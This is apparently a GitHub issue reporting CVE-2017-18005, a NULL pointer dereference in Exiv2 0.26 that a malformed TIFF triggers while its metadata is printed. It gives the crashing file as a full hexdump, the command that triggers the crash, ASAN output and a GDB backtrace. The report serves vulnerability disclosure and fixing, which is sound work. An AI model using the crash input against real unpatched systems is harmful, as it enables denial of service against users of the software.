Headline
CVE-2017-18005: CVE-2017-18005: NULL Pointer Dereference while extracting metadata of a malformed tiff · Issue #168 · Exiv2/exiv2
Exiv2 0.26 has a Null Pointer Dereference in the Exiv2::DataValue::toLong function in value.cpp, related to crafted metadata in a TIFF file.
There’s a NULL Pointer Dereference occurring during the metadata extraction from a malformed tiff file.
This can be triggered by running ./exiv2 -v pr -P EIXxgklnycsvth %file% on the test-case, exiv2-nullpointerderef.zip.
The hexdump of the test-case is:
0000000 4949 002a 0050 0000 3030 3030 3030 3030
0000010 3030 3030 3030 3030 3030 3030 3030 3030
*
0000050 000f 0117 0006 0030 0000 3030 3030 3030
0000060 0003 0030 0000 3030 3030 3030 0002 0030
0000070 0000 3030 3030 3030 000b 0030 0000 3030
0000080 3030 3030 000b 0030 0000 3030 3030 3030
0000090 000b 0030 0000 3030 3030 3030 000b 0030
00000a0 0000 3030 3030 3030 0003 0030 0000 3030
00000b0 3030 3030 000b 0030 0000 3030 3030 3030
00000c0 000b 0030 0000 3030 3030 3030 000a 0000
00000d0 0000 3030 3030 3030 000b 0030 0000 3030
00000e0 3030 3030 000b 0030 0000 3030 3030 3030
00000f0 0003 0030 0000 3030 3030 3030 000c 0000
0000100 0000 3030 3030 0000 0000
0000109
The relevant ASAN output is:
==4728==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557dc0c47468 bp 0x7fff7558bbb0 sp 0x7fff7558bbb0 T0)
==4728==The signal is caused by a READ memory access.
==4728==Hint: address points to the zero page.
#0 0x557dc0c47467 in Exiv2::DataValue::toLong(long) const /home/ksg/exiv2/src/value.cpp:250
#1 0x557dc0688058 in Action::Print::printMetadatum(Exiv2::Metadatum const&, Exiv2::Image const*) /home/ksg/exiv2/src/actions.cpp:731
#2 0x557dc068bad2 in Action::Print::printMetadata(Exiv2::Image const*) /home/ksg/exiv2/src/actions.cpp:552
#3 0x557dc068d61a in Action::Print::printList() /home/ksg/exiv2/src/actions.cpp:541
#4 0x557dc06b8fff in Action::Print::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/ksg/exiv2/src/actions.cpp:245
#5 0x557dc05983a6 in main /home/ksg/exiv2/src/exiv2.cpp:170
#6 0x7f2987d301c0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x211c0)
#7 0x557dc0621b59 in _start (/home/ksg/testbench/exiv2_asan+0x22bb59)
It looks like the NULL-Pointer Dereference is being triggered by a 0 value which is being used in the toLong function in the value of n, which is being dereferenced in
return value_[n];
This is indicated by the GDB backtrace:
Program received signal SIGSEGV, Segmentation fault.
Exiv2::DataValue::toLong (this=0x55555609d860, n=0) at value.cpp:250
250 return value_[n];
(gdb) bt
#0 Exiv2::DataValue::toLong (this=0x55555609d860, n=0) at value.cpp:250
#1 0x000055555561d5f1 in Action::Print::printMetadatum (this=this@entry=0x555556092e70, md=..., pImage=pImage@entry=0x555556093530) at actions.cpp:731
#2 0x000055555561ecf0 in Action::Print::printMetadata (this=this@entry=0x555556092e70, image=image@entry=0x555556093530) at actions.cpp:552
#3 0x000055555561f2fb in Action::Print::printList (this=this@entry=0x555556092e70) at actions.cpp:541
#4 0x00005555556313c8 in Action::Print::run (this=0x555556092e70, path="/home/ksg/exif-crashes/npd") at actions.cpp:245
#5 0x00005555555bc339 in main (argc=<optimized out>, argv=<optimized out>) at exiv2.cpp:170
Debug info:
Exiv2 version 0.26 001a00 (64 bit build)
Compiler: gcc 7.2, clang 4.0.1-6
OS: Ubuntu 17.10